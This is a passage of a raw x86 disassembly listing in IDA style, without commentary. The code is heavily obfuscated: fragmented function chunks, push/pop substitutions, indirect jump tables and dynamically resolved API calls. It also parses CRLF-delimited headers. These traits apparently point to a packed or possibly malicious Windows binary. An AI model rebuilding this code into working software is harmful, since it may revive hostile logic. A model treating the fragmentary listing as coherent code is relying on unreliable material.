; END OF FUNCTION CHUNK FOR sub_9B4CF4
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B2584: ; CODE XREF: sub_9B0930-4885�j
push off_9BAC5F
push dword ptr [eax]
pop eax
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx]
mov [edx+6Ch], eax
mov eax, dword_9BCB74
push dword ptr [eax]
pop eax
mov ecx, [eax+6Ch]
test ecx, ecx
jz loc_9B23EF
jmp loc_9B1EF0
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9B25BC: ; CODE XREF: sub_9B5904-E4E�j
; DATA XREF: .text:off_9B9384�o
cmp dword_9BEC30[eax], edi
jnz loc_9AB198
jmp loc_9B3EE8
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-334h]
pop esi
; START OF FUNCTION CHUNK FOR sub_9AD1A4
loc_9B25E5: ; CODE XREF: sub_9AD1A4+189D�j
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BA97F
call dword ptr [ecx+1Ch]
mov eax, esi
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp-1Ch]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9AD1A4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B2618: ; CODE XREF: sub_9AF25C+4D0E�j
push 0Ch
pop edx
push edi
pop ecx
call sub_9AEE5C
test al, 1
jz loc_9AB9C8
jmp off_9B9598
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B2630: ; CODE XREF: sub_9B04A8+4CF5�j
test bl, 4
jz loc_9AFD43
jmp loc_9ACA28
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B2640: ; CODE XREF: sub_9B1F68+2414�j
mov esi, [eax+ebp-24Ch]
test esi, esi
jz loc_9B58FB
jmp loc_9B58E4
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF654
loc_9B2654: ; CODE XREF: sub_9AF654+114A�j
; DATA XREF: .text:off_9B887A�o
and ecx, 3
rep stosb
add dword ptr [edx], 0FFFFFDC0h
mov ecx, edx
call sub_9B3150
test eax, eax
jz loc_9B06EB
jmp loc_9AEB6C
; END OF FUNCTION CHUNK FOR sub_9AF654
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0734
loc_9B2674: ; CODE XREF: sub_9B0734-5492�j
; sub_9B0734-39C5�j
mov esi, 41h
loc_9B2679: ; CODE XREF: sub_9B0734-39CB�j
push esi
pop eax
pop esi
pop ecx
retn 8
; END OF FUNCTION CHUNK FOR sub_9B0734
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9B2680: ; CODE XREF: sub_9B2830-7078�j
cmp esi, [ebp+8]
jnz loc_9AD190
jmp loc_9B4318
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B2690: ; CODE XREF: sub_9B3864-F82�j
push 201h
pop ecx
div ecx
add edx, 200h
loc_9B269E: ; CODE XREF: sub_9B3864-882A�j
mov [ebp+var_2074], edx
push edx
lea edx, [ebp+var_201C]
push edx
mov eax, [ebp+var_2028]
push eax
lea ecx, [ebp+var_2068]
lea edx, [ebp+var_2050]
call sub_9B174C
push [ebp+var_2050]
pop ecx
test ecx, ecx
jz loc_9AF480
jmp off_9B9336
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9ACA48
loc_9B26DF: ; CODE XREF: sub_9ACA48+93D2�j
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, dword_9BCB74
mov edx, [ecx]
push 0
call dword ptr [edx+60h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
xor eax, eax
pop edi
pop esi
pop ebx
mov ecx, [ebp-1Ch]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9ACA48
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp+0Ch]
pop ebx
push ebx
pop eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9B273C: ; CODE XREF: sub_9B2E04+2250�j
; DATA XREF: .text:off_9B9CEC�o
cmp edi, 0FFFFFFFFh
jz loc_9AC13B
jmp loc_9AB634
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B274C: ; CODE XREF: sub_9B1F68+2B08�j
mov ecx, [ebp-38h]
push ecx
lea edx, [ebp-3Ch]
push edx
push 64h
lea eax, [ebp-3E0h]
push eax
push 6
pop ecx
call sub_9AB1A0
push dword ptr [ebp-3Ch]
pop eax
test eax, eax
loc_9B276B: ; CODE XREF: sub_9B1F68+2B02�j
jbe loc_9B01DE
jmp loc_9ACE54
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B2778: ; CODE XREF: sub_9B4950-1296�j
lea edi, [esi+esi*4]
shl edi, 3
cmp dword_9BEC1C[edi], ebx
jz loc_9B5C2E
jmp off_9B9388
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B2790: ; CODE XREF: sub_9B0930+5A19�j
push off_9BA344
push ecx
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
mov [edx+4], eax
mov eax, dword_9BCB74
mov eax, [eax]
push dword ptr [eax+4]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B8E29
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B27C0: ; CODE XREF: sub_9B04A8-4503�j
; sub_9B04A8+4099�j
mov dword ptr [ebp-4044h], 0
loc_9B27CA: ; CODE XREF: sub_9B04A8-2045�j
push dword ptr [ebp-4040h]
pop eax
inc eax
jmp loc_9B4354
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B27D8 proc near ; CODE XREF: sub_9AB3B0+71A0�j
; FUNCTION CHUNK AT 009AB32B SIZE 00000046 BYTES
; FUNCTION CHUNK AT 009AD694 SIZE 0000003A BYTES
; FUNCTION CHUNK AT 009AF59C SIZE 00000046 BYTES
; FUNCTION CHUNK AT 009B01A7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B0F40 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B43CC SIZE 00000025 BYTES
push ebx
pop edi
sub edx, eax
dec edi
loc_9B27DD: ; CODE XREF: sub_9B27D8+B�j
mov cl, [edi+1]
inc edi
or cl, cl
jnz short loc_9B27DD
jmp off_9B9E5E
sub_9B27D8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B0FD0
loc_9B27EF: ; CODE XREF: sub_9B0FD0+4D8D�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword_9BCB74
pop edx
mov eax, [edx]
push off_9B9632
call dword ptr [eax+1Ch]
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B0FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B281C: ; CODE XREF: sub_9AF030+6150�j
; DATA XREF: .text:off_9B8ECE�o
push [ebp+var_28]
pop edx
cmp edx, [edi]
jnz loc_9AC620
jmp loc_9B37E8
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B2830 proc near ; CODE XREF: sub_9B2F1C-4884�p
; FUNCTION CHUNK AT 009AB7AC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009ABEF0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AD190 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B2680 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B3804 SIZE 0000005D BYTES
; FUNCTION CHUNK AT 009B4318 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B4590 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B4901 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B4B4C SIZE 0000000E BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B8870
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
sub eax, eax
mov [ebp-18h], esp
mov [ebp-1Ch], eax
push ecx
pop ebx
push 1FFCh
pop ecx
mov edx, ebx
mov [ebp-4], eax
call sub_9B649C
push eax
pop esi
mov [ebp-1Ch], esi
cmp esi, 0Ah
jb loc_9AD190
jmp loc_9AB7AC
sub_9B2830 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3FF8
loc_9B2884: ; CODE XREF: sub_9B3FF8-82E8�j
; sub_9B3FF8-5BA3�j ...
mov [ebp+var_1C], 0
jmp loc_9AF9C3
; END OF FUNCTION CHUNK FOR sub_9B3FF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4480
loc_9B2890: ; CODE XREF: sub_9B4480-87D0�j
; DATA XREF: .text:off_9B9014�o
mov [ebp+var_32C], ebx
push dword_9BCB74
pop ecx
mov edx, [ecx+0Ch]
lea eax, [ebp+var_32C]
push eax
push edi
push esi
push esi
lea ecx, [ebp+var_120]
push ecx
mov eax, [ebp+var_330]
push eax
call dword ptr [edx+10h]
test eax, eax
jnz loc_9B46EF
jmp off_9BAAC8
; END OF FUNCTION CHUNK FOR sub_9B4480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B28CC: ; CODE XREF: sub_9B3864-3664�j
mov edx, [ebp+var_2028]
mov [ebp+var_2058], edx
call sub_9B45AC
xor edx, edx
cmp edi, 6
jnz loc_9B2690
jmp loc_9AB02C
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AFB1C
loc_9B28F0: ; CODE XREF: sub_9AFB1C+62AF�j
; DATA XREF: .text:off_9B9575�o
mov [esi+2], ax
mov eax, 10h
mov [ebp-1Ch], eax
loc_9B28FC: ; CODE XREF: sub_9AFB1C-1323�j
test bl, 10h
jz loc_9ACDC0
jmp loc_9ACDB4
; END OF FUNCTION CHUNK FOR sub_9AFB1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B290C: ; CODE XREF: sub_9AB1A0-367�j
; sub_9AB1A0+5383�j ...
xor edi, edi
mov [ebp-1Ch], edi
loc_9B2911: ; CODE XREF: sub_9AB1A0-36D�j
; sub_9AB1A0+2B1C�j ...
push edi
call sub_9B3EFC
add esp, 4
test eax, eax
jz loc_9AD304
jmp loc_9B1038
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9B292C: ; CODE XREF: sub_9B3408-7670�j
; DATA XREF: .text:off_9BA938�o
push dword ptr [ebp-130h]
pop edx
cmp edx, [ebp-128h]
jnz loc_9AB749
jmp loc_9AD158
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B2944: ; CODE XREF: sub_9B4950-7581�j
; sub_9B4950-181D�j
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push offset dword_9BBCE0
call dword ptr [ecx+18h]
sub ecx, ecx
loc_9B2958: ; CODE XREF: sub_9B4950-D6F�j
mov [ebp-1Ch], ecx
cmp ecx, 20h
jge loc_9AB2E8
jmp off_9B9E9F
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B296C: ; CODE XREF: sub_9ADAC4-1C86�j
; DATA XREF: .text:off_9BA6DF�o
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
push edi
call dword ptr [edx+38h]
jmp loc_9AE6B5
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9B2984: ; CODE XREF: sub_9B649C-7AA1�j
lea ecx, [eax+2]
cmp ecx, edi
ja loc_9ACCD8
jmp off_9BA4D5
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEDD0
loc_9B2998: ; CODE XREF: sub_9AEDD0+4466�j
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push off_9BAD92
call dword ptr [eax+1Ch]
mov eax, esi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_9AEDD0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B29B0 proc near ; CODE XREF: sub_9B2118:loc_9B2AE4�p
; FUNCTION CHUNK AT 009AE9CC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B22D0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 009B541B SIZE 00000028 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA69C
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 218h
push dword_9B8788
pop eax
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
sub esi, esi
mov [ebp-18h], esp
mov [ebp-228h], esi
mov [ebp-4], esi
lea eax, [ebp-224h]
push eax
push 3
call sub_9B4CF4
add esp, 8
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
push esi
lea eax, [ebp-224h]
push eax
call dword ptr [edx+98h]
or eax, eax
jnz loc_9AE9CC
jmp off_9B901C
sub_9B29B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B2A28: ; CODE XREF: sub_9B63D8-A94�j
; DATA XREF: .text:off_9BAD10�o
call sub_9B45AC
sub edx, edx
div ebx
push dword ptr [esi+0Ch]
pop eax
mov ecx, [eax+edx*4]
mov ebx, [ecx]
mov [ebp-2178h], ebx
push ebx
call sub_9B3EFC
jmp off_9B9823
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B2A4C: ; CODE XREF: sub_9B4950-194�j
mov dword_9BEC24[edi], 1
push dword_9BEC2C[edi]
pop ebx
mov ecx, [ebp-20h]
push ecx
lea esi, [ebp-4Ch]
mov eax, ebx
call sub_9AC250
push dword ptr [ebp-4Ch]
pop edx
push edx
push ebx
push off_9B9F6A
call sub_9ABF08
mov dword_9BEC34[edi], eax
push dword ptr [ebp-48h]
pop eax
push eax
mov ecx, dword_9BEC2C[edi]
push ecx
push off_9BB054
call sub_9ABF08
mov dword_9BEC38[edi], eax
mov edx, [ebp-44h]
push edx
push dword_9BEC2C[edi]
pop eax
push eax
jmp off_9B8F85
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
loc_9B2AB4: ; CODE XREF: .text:009AE668�j
; .text:009B20AB�j
; DATA XREF: ...
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
call dword ptr [edx+30h]
sub eax, esi
cmp eax, 3E8h
jb loc_9AE654
jmp off_9BACBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9B2AD4: ; CODE XREF: sub_9B03E8-F06�j
cmp eax, 80000000h
jb loc_9B6224
jmp loc_9B42D0
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2118
loc_9B2AE4: ; CODE XREF: sub_9B2118-26D3�j
call sub_9B29B0
test eax, eax
jz loc_9B034B
jmp loc_9B0570
; END OF FUNCTION CHUNK FOR sub_9B2118
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B2AF8: ; CODE XREF: sub_9ADAC4+1F6C�j
cmp edi, 0FFFFFFFFh
jz loc_9AE6B5
jmp loc_9AD64C
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B037C
loc_9B2B08: ; CODE XREF: sub_9B037C-3268�j
; sub_9B037C+5B22�j
test al, 4
jz loc_9AB9A8
jmp loc_9ABFEC
; END OF FUNCTION CHUNK FOR sub_9B037C
; ---------------------------------------------------------------------------
align 4
off_9B2B18 dd offset loc_9ACC20 ; DATA XREF: sub_9ADDA4:loc_9B1C08�r
dd offset loc_9AF1E0
dd offset loc_9AC55C
dd offset loc_9AC9C8
dd offset loc_9AC9C8
dd offset loc_9AF238
dd offset loc_9AF238
dd offset loc_9B2BE4
dd offset loc_9B2BE4
dd offset loc_9B2BE4
; ---------------------------------------------------------------------------
mov dword_9BCB98, 0
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9B2B4C: ; CODE XREF: sub_9B03E8+5E4F�j
mov esi, 1
loc_9B2B51: ; CODE XREF: sub_9B03E8+3EEA�j
mov [ebp-150h], esi
call sub_9B2490
mov ebx, eax
neg ebx
sbb ebx, ebx
and ebx, 2000h
call sub_9ACD20
neg eax
sbb eax, eax
and eax, 1000h
or ebx, eax
call sub_9B3618
neg eax
sbb eax, eax
and eax, 800h
or ebx, eax
call sub_9AF704
neg eax
sbb eax, eax
and eax, 400h
or ebx, eax
neg esi
sbb esi, esi
and esi, 200h
or ebx, esi
neg edi
sbb edi, edi
and edi, 100h
or ebx, edi
mov word ptr dword_9BF380, bx
mov dword ptr [ebp-0B0h], 94h
push dword_9BCB74
pop eax
mov ecx, [eax]
lea edx, [ebp-0B0h]
push edx
call dword ptr [ecx+90h]
and eax, eax
jz loc_9B56A0
jmp loc_9B394C
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9B2BE4: ; CODE XREF: sub_9ADDA4:loc_9B1C08�j
; DATA XREF: .text:009B2B34�o ...
lea edx, [edi-3]
mov [ebp-20h], edx
jmp loc_9AED43
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ABF08
loc_9B2BF0: ; CODE XREF: sub_9ABF08+768F�j
; DATA XREF: .text:off_9B8CD6�o
cmp eax, 0FFFFFFFFh
jz loc_9AF20F
jmp off_9BA0C1
; END OF FUNCTION CHUNK FOR sub_9ABF08
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B46CC
loc_9B2C00: ; CODE XREF: sub_9B46CC-229D�j
mov eax, 54A9D400h
loc_9B2C05: ; CODE XREF: sub_9B46CC-22A3�j
; sub_9B46CC+169E�j
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop ecx
lea edx, [eax-54600h]
push 6EF5DE4Dh
pop eax
mul edx
shr edx, 12h
push edx
push off_9BA96D
call dword ptr [ecx+34h]
loc_9B2C2A: ; CODE XREF: sub_9B46CC-57F3�j
mov eax, dword_9BEC14
retn
; END OF FUNCTION CHUNK FOR sub_9B46CC
; =============== S U B R O U T I N E =======================================
sub_9B2C30 proc near ; CODE XREF: sub_9AB11C+22�p
; FUNCTION CHUNK AT 009B6039 SIZE 00000003 BYTES
push esi
push edi
push ecx
pop edi
mov esi, edx
test edi, edi
jz loc_9B6039
jmp sub_9ADE44
sub_9B2C30 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF704
loc_9B2C44: ; CODE XREF: sub_9AF704+2D�j
; DATA XREF: .text:off_9B9534�o
mov [ebp-4], eax
mov eax, 1
; END OF FUNCTION CHUNK FOR sub_9AF704
; ---------------------------------------------------------------------------
dd 0B073F0Fh, 1E445C7h, 0E9000000h, 2077h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B2C5C: ; CODE XREF: sub_9B1A08-36C2�j
; sub_9B1A08+2EDD�j
mov eax, [ebp+var_41E4]
loc_9B2C62: ; CODE XREF: sub_9B1A08-307D�j
test eax, eax
jz loc_9B17C7
jmp loc_9AF0A8
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B2C70 proc near ; CODE XREF: sub_9B1F68-3EB6�j
; FUNCTION CHUNK AT 009AD0D8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009AD668 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 009AE9B4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B01C4 SIZE 00000017 BYTES
push ebx
call dword ptr [ecx+50h]
mov [ebp-58h], eax
test eax, eax
jnz loc_9AD0D8
jmp off_9B8D42
sub_9B2C70 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B2C88: ; CODE XREF: sub_9B0930+2E9�j
; DATA XREF: .text:off_9BAD59�o
push dword ptr [eax+10h]
pop edx
cmp dword ptr [edx], 0
jz loc_9B23EF
jmp loc_9AD254
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B2C9C: ; CODE XREF: sub_9ACEE8+78F0�j
or ebx, ebx
jnz loc_9AC65C
jmp off_9B9F82
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B2CB4: ; CODE XREF: sub_9B63D8-9AD8�j
; DATA XREF: .text:off_9BAAC4�o
cmp dword ptr [eax+ebp-2120h], 0A0D0A0Dh
jnz loc_9B60CC
jmp off_9B8E9C
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4CF4
loc_9B2CCC: ; CODE XREF: sub_9B4CF4+43�j
push offset dword_9BBD34
pop eax
mov edx, eax
loc_9B2CD4: ; CODE XREF: sub_9B4CF4-201B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_9B2CD4
jmp off_9B9518
; END OF FUNCTION CHUNK FOR sub_9B4CF4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B327C
loc_9B2CE4: ; CODE XREF: sub_9B327C-8168�j
; DATA XREF: .text:off_9BA137�o
and eax, 0F0FFh
cmp eax, 10ACh
jz loc_9B4264
jmp off_9BA3CC
; END OF FUNCTION CHUNK FOR sub_9B327C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5FC0
loc_9B2CFC: ; CODE XREF: sub_9B5FC0-3EAE�j
push dword_9BCB74
pop edx
push dword ptr [edx+0Ch]
pop eax
push [ebp+var_128]
pop ecx
push ecx
call dword ptr [eax+14h]
loc_9B2D12: ; CODE XREF: sub_9B5FC0-3EB4�j
push dword_9BCB74
pop edx
push dword ptr [edx+0Ch]
pop eax
mov ecx, [ebp+var_124]
push ecx
call dword ptr [eax+14h]
loc_9B2D27: ; CODE XREF: sub_9B5FC0-5EA2�j
inc esi
jmp loc_9B6000
; END OF FUNCTION CHUNK FOR sub_9B5FC0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ACF9C
loc_9B2D30: ; CODE XREF: sub_9ACF9C+2D46�j
mov ecx, [ebp+14h]
push ecx
mov edx, [ebp+10h]
push edx
push dword_9BCB74
pop eax
mov ecx, [eax+10h]
push dword ptr [ebp+0Ch]
pop esi
xor edx, edx
mov dx, [esi+2]
push edx
call dword ptr [ecx+28h]
movzx eax, ax
push eax
push dword ptr [esi+4]
pop ecx
push ecx
mov ecx, [ebx]
sub ecx, 200h
mov edx, [ebx+48h]
push edx
push 1
call sub_9AFC28
jmp loc_9AF134
; END OF FUNCTION CHUNK FOR sub_9ACF9C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B2D74: ; CODE XREF: sub_9B1D80+292E�j
; DATA XREF: .text:off_9B98EA�o
test ebx, ebx
jnz loc_9AB0A2
jmp off_9B925C
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0D34
loc_9B2D84: ; CODE XREF: sub_9B0D34-1471�j
mov [edi], eax
push 4
pop eax
; END OF FUNCTION CHUNK FOR sub_9B0D34
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B2D8C: ; CODE XREF: sub_9B0930-4090�j
; DATA XREF: .text:off_9B89DD�o
push dword ptr [eax+4]
pop edx
cmp dword ptr [edx], 0
jz loc_9B23EF
jmp off_9B97D9
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B2DA0: ; CODE XREF: sub_9ADAC4-21C8�j
; DATA XREF: .text:off_9B96EC�o
lea ecx, [ebp+esi*4-84h]
cmp dword ptr [ecx], 0
jz loc_9ABFB9
jmp off_9BA66F
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B2DB8: ; CODE XREF: sub_9B0930+1E88�j
; DATA XREF: .text:off_9B8E29�o
push off_9BA370
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx]
pop ecx
mov [ecx+8], eax
push dword_9BCB74
pop edx
mov eax, [edx]
push dword ptr [eax+8]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp loc_9AE390
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B2DEC: ; CODE XREF: sub_9B63D8-7BA5�j
; DATA XREF: .text:off_9B9840�o
cmp word ptr [ebx+ebp-20FBh], 0A0Dh
jnz loc_9B469E
jmp off_9BAF2C
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B2E04 proc near ; DATA XREF: .text:off_9BB054�o
var_4058 = dword ptr -4058h
var_4050 = dword ptr -4050h
var_4044 = dword ptr -4044h
var_4040 = dword ptr -4040h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009AB634 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AC13B SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009ACB90 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009AF098 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B1064 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009B240C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B273C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B504C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B572A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B6160 SIZE 00000028 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BAFDF
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push 4040h
pop eax
call __alloca_probe
push dword_9B8788
pop eax
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov esi, [ebp+arg_0]
mov [ebp+var_4044], esi
mov eax, [esi+0Ch]
